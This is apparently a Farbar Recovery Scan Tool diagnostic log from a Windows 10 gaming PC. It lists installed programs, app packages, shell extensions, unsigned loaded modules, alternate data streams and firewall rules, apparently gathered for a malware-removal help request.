Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 102.0.1 (x64 en-US)) (Version: 102.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
qBittorrent 4.4.2 (HKLM-x32\...\qBittorrent) (Version: 4.4.2 - The qBittorrent project)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version:  - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version:  - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.89.862.g94554d24 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version:  - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
 
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.15.0_x86__ffd303wmbhcjt [2022-07-13] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-08] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2222.12.0_x64__cv1g1gvanyjgm [2022-07-01] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [   AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
 
==================== Shortcuts & WMI ========================
 
==================== Loaded Modules (Whitelisted) =============
 
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 126965248 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 000384000 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 008006656 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2022-07-17 18:38 - 2022-07-17 18:38 - 000257536 _____ () [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\GFSDK_GodraysLib.x64.dll
2022-07-17 18:38 - 2022-07-17 18:38 - 000045568 _____ () [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\GFSDK_PSM.win64.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2022-07-17 18:37 - 2022-07-17 18:37 - 000113664 _____ (Sony Computer Entertainment Inc.) [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\libScePad_x64.dll
2020-07-31 18:19 - 2020-07-31 18:19 - 000023040 _____ (Synaptics Incorporated.) [File not signed] C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj\SynAudSrvDll.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 000983552 _____ (The Chromium Authors) [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2021-09-14 00:46 - 005979312 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298]
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
 
==================== Safe Mode (Whitelisted) ==================
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer (Whitelisted) ==========
 
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [TCP Query User{75F1F7B6-893C-4C9A-8BEB-1A01FE14D19B}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{C570E9D4-54C7-4C8E-BFE2-33790B0CDEE4}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{512DD18C-E03C-4F68-ADDB-C1B6C668DE92}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{BDFC16B9-6362-4C4F-B63A-563BB28D6D95}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{D375EA9F-C466-429B-9310-86A9AF754CE7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{1111D7E9-0263-4BEA-AE48-5814F94C25AE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{E129FC62-A6F4-43F0-A596-705A65A6ECBE}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{8B14CB93-57E1-4205-86E0-9D64AD5CD2C2}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{0F55258B-E84A-4C72-B334-56F8FAF8F9AB}C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe (Rocksteady Studios Ltd.) [File not signed]
FirewallRules: [UDP Query User{001269EE-BB0B-4D46-9E3F-07C960BA49C3}C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe (Rocksteady Studios Ltd.) [File not signed]
FirewallRules: [{E4D8E207-53E2-4BCA-857B-95C442C4A003}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
